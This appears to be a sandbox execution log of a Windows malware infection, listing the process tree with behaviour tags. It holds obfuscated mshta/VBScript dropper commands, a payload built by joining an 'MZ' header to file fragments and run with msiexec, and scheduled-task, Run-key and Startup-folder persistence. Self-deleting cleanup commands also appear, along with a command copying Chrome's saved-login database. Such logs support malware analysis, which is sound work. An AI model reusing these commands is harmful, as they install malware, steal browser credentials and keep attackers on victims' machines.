C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))9⤵PID:4644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"10⤵PID:5232
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))9⤵
- Checks whether UAC is enabled
PID:5540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t10⤵
- Checks whether UAC is enabled
PID:4644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "11⤵PID:5812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"11⤵PID:5176
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU11⤵PID:6568
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"8⤵
- Kills process with taskkill
PID:5144
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2012 -
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
PID:6932
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵
- Executes dropped EXE
PID:4932
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3120
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵
- Executes dropped EXE
PID:3880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe" & exit7⤵
- Blocklisted process makes network request
PID:2104 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f8⤵
- Kills process with taskkill
PID:6388
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6608
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6364 -
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵
- Checks computer location settings
PID:2524 -
C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"8⤵PID:6344
-
-
C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"8⤵PID:4568
-
-
C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"8⤵
- Checks whether UAC is enabled
PID:7404 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
- Checks whether UAC is enabled
PID:8064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:8936
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "PevlGZ3PxwUKzaOKeJMTqLD6.exe"11⤵
- Kills process with taskkill
PID:4016
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"8⤵PID:7388
-
-
C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"8⤵PID:7380
-
-
C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8120
-
-
C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"8⤵PID:5940
-
-
C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"8⤵PID:7788
-
C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp"C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp" /SL5="$5048C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"9⤵
- Checks whether UAC is enabled
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:8768 -
C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe"C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe" /VERYSILENT11⤵
- Checks whether UAC is enabled
PID:7964
-
-
C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"11⤵
- Checks computer location settings
PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"11⤵
- Checks whether UAC is enabled
PID:4520 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive & exit12⤵PID:8652
-
C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive13⤵PID:9916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exeC:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
PID:10016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe & exit12⤵PID:9288
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exeC:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe13⤵PID:10140
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe"C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe" -u14⤵PID:7012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:6232
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive & exit12⤵PID:9480
-
C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive13⤵PID:10236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oovml3wk.oru\autosubplayer.exe /S & exit12⤵PID:9612
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"8⤵PID:7772
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe" -u9⤵PID:7940
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:3484
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵PID:4780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
PID:2164
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:4960
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵PID:3096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵PID:2176
-
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:6320 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"3⤵PID:5584
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:9208
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵PID:6400
-
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Enumerates system info in registry
PID:4976
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe2⤵
- Suspicious use of SetThreadContext
PID:6172 -
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5000
-
-
-
C:\Users\Admin\AppData\Local\Temp\C1DC.exeC:\Users\Admin\AppData\Local\Temp\C1DC.exe2⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\C71D.exeC:\Users\Admin\AppData\Local\Temp\C71D.exe2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\D305.exeC:\Users\Admin\AppData\Local\Temp\D305.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D305.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D305.exe" & del C:\ProgramData\*.dll & exit3⤵PID:8412
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D305.exe /f4⤵
- Kills process with taskkill
PID:8992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DD37.exeC:\Users\Admin\AppData\Local\Temp\DD37.exe2⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵PID:6376
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
PID:6156
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵PID:7084
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
- Executes dropped EXE
PID:4972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2618.exeC:\Users\Admin\AppData\Local\Temp\2618.exe2⤵PID:7724
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:4408
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\3EC2.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\4386.exeC:\Users\Admin\AppData\Local\Temp\4386.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5084
-
-
C:\Users\Admin\AppData\Local\Temp\743B.exeC:\Users\Admin\AppData\Local\Temp\743B.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9060
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe2⤵
- Suspicious use of SetThreadContext
PID:9624 -
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe3⤵
- Adds Run key to start application
PID:5040 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a10ad8b7-4b73-4fc7-be07-0e91604e81ac" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
PID:9128 -
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:4420
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"6⤵
- Suspicious use of SetThreadContext
PID:4376 -
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"7⤵
- Checks processor information in registry
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:9920
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
PID:9628
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:4624
-
-
-
-
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"6⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:8972 -
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"7⤵PID:9108
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
PID:8244
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B92C.exeC:\Users\Admin\AppData\Local\Temp\B92C.exe2⤵
- Checks processor information in registry
PID:996 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im B92C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B92C.exe" & del C:\ProgramData\*.dll & exit3⤵PID:10160
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im B92C.exe /f4⤵
- Kills process with taskkill
PID:9312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BCF6.exeC:\Users\Admin\AppData\Local\Temp\BCF6.exe2⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\C3AE.exeC:\Users\Admin\AppData\Local\Temp\C3AE.exe2⤵PID:7116
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )3⤵PID:9148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\C3AE.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\C3AE.exe") do taskkill /iM "%~nXN" -f4⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵PID:9528
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )6⤵PID:2984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f7⤵PID:9688
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )6⤵PID:7792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵PID:8700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:5088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵PID:9848
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵PID:10216
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "C3AE.exe" -f5⤵
- Kills process with taskkill
PID:6704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C729.exeC:\Users\Admin\AppData\Local\Temp\C729.exe2⤵PID:10128
-
-
C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"2⤵PID:9020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:8868
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
PID:4020 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5276
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2804
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2644
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1108
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:8852
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9360
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:5976
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:9732 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7140
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:6516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9668
-
-
C:\Users\Admin\AppData\Roaming\wtateuwC:\Users\Admin\AppData\Roaming\wtateuw2⤵PID:692
-
-
C:\Users\Admin\AppData\Roaming\jaateuwC:\Users\Admin\AppData\Roaming\jaateuw2⤵PID:5332
-
-
C:\Users\Admin\AppData\Roaming\ajateuwC:\Users\Admin\AppData\Roaming\ajateuw2⤵PID:5568
-
-
